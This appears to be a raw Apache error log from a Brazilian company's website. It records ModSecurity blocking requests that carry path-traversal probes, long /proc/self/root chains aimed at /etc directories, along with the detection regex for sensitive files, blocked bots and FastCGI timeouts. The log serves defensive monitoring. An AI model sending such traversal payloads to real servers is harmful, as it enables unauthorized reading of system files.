[Wed Mar 18 03:25:27.200495 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:38790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpFVwkwaGbbGflqUZDOcAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 03:25:43.046387 2026] [proxy_fcgi:error] [pid 19507:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48912] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:26:04.427026 2026] [:error] [pid 11816:tid 140411540502272] [client 216.73.216.191:14880] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpFfOw_le52K8_3pV2baAAAAhg"]
[Wed Mar 18 03:26:06.125773 2026] [proxy_fcgi:error] [pid 15051:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:49214] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:26:29.049897 2026] [proxy_fcgi:error] [pid 11816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:49576] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:26:36.389527 2026] [core:alert] [pid 17653:tid 140411649607424] [client 74.7.241.31:35752] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/lib/systemd/system
[Wed Mar 18 03:26:42.483312 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.244.43:51710] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpFota6ubjKNq_cu4ZQbgAAA1M"]
[Wed Mar 18 03:26:52.789804 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49940] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:26:54.792710 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.228.61:36700] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpFrgkwaGbbGflqUZDOlQAAANQ"]
[Wed Mar 18 03:27:04.831808 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:33776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpFuOw_le52K8_3pV2bjgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:27:15.131335 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50244] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:27:39.049840 2026] [proxy_fcgi:error] [pid 29882:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:50602] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:27:47.488341 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.128:35386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpF4tY0UrI5A3LftIxLdwAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:28:01.133841 2026] [proxy_fcgi:error] [pid 11816:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50856] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:28:25.119575 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51222] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:28:46.134104 2026] [proxy_fcgi:error] [pid 11816:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51598] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:29:08.133996 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52022] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:29:18.547207 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:57648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpGPda6ubjKNq_cu4ZRuwAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:29:30.089886 2026] [proxy_fcgi:error] [pid 11816:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52250] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:29:52.033807 2026] [proxy_fcgi:error] [pid 15051:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52504] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:29:58.037700 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:41844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpGZtY0UrI5A3LftIxNuwAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 03:30:17.037911 2026] [proxy_fcgi:error] [pid 29882:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52886] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:30:39.127715 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53236] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:31:01.093867 2026] [proxy_fcgi:error] [pid 11816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53560] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:31:12.561253 2026] [core:alert] [pid 17653:tid 140411674785536] [client 74.7.243.128:56602] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware
[Wed Mar 18 03:31:24.133938 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:53926] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:31:42.022319 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:55502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpGzfu8EFLIOrSqIpvEEQAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:31:43.614911 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.244.43:49866] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpGzwkwaGbbGflqUZDQbQAAANg"]
[Wed Mar 18 03:31:47.069823 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54288] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:31:55.142985 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.228.61:55152] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpG2ymAPhZkrhU8w4krQgAAAJU"]
[Wed Mar 18 03:32:08.141876 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54586] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:32:21.465823 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:50002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpG9dY0UrI5A3LftIxOOgAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:32:30.129835 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54896] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:32:54.149785 2026] [proxy_fcgi:error] [pid 31803:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55206] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:33:13.526699 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:57048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpHKQkwaGbbGflqUZDQ-QAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 03:33:15.110897 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55486] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:33:40.117772 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56930] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:34:03.594173 2026] [proxy_fcgi:error] [pid 15051:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59166] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:34:27.369815 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33858] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:34:50.792240 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35012] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:34:58.341352 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:36410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpHkuoXxyEfFpUF8f8q1QAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:35:14.133789 2026] [proxy_fcgi:error] [pid 15051:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37164] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:35:36.037823 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37548] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:36:00.122728 2026] [proxy_fcgi:error] [pid 15051:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37968] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:36:06.575778 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.243.128:43342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpH1kzinOy1jxa1j4fP0AAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:36:09.691781 2026] [:error] [pid 17653:tid 140411582465792] [client 216.73.216.191:32234] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpH2cdf6f5d65gmYZSN_wAAAtM"]
[Wed Mar 18 03:36:13.701004 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:60872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpH3eyqAr6etmhZHNp11AAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:36:22.132745 2026] [:error] [pid 11816:tid 140411716749056] [client 216.73.216.191:50127] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpH5uw_le52K8_3pV2eLQAAAgM"]
[Wed Mar 18 03:36:22.921800 2026] [proxy_fcgi:error] [pid 29882:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38538] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:36:32.531660 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:37126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpH8EzinOy1jxa1j4fP3AAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:36:33.241903 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] [client 179.188.53.243:44406] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.241943 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (104)Connection reset by peer: [client 179.188.53.243:44406] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.244215 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] [client 179.188.53.243:38904] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.244257 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (104)Connection reset by peer: [client 179.188.53.243:38904] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.251058 2026] [proxy_fcgi:error] [pid 19507:tid 140411708356352] [client 179.188.53.243:43262] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.251097 2026] [proxy_fcgi:error] [pid 19507:tid 140411708356352] (104)Connection reset by peer: [client 179.188.53.243:43262] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.251694 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] [client 179.188.53.243:40082] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.251726 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (104)Connection reset by peer: [client 179.188.53.243:40082] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.253340 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] [client 179.188.53.243:42432] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.253361 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (104)Connection reset by peer: [client 179.188.53.243:42432] AH01075: Error dispatching request to : 
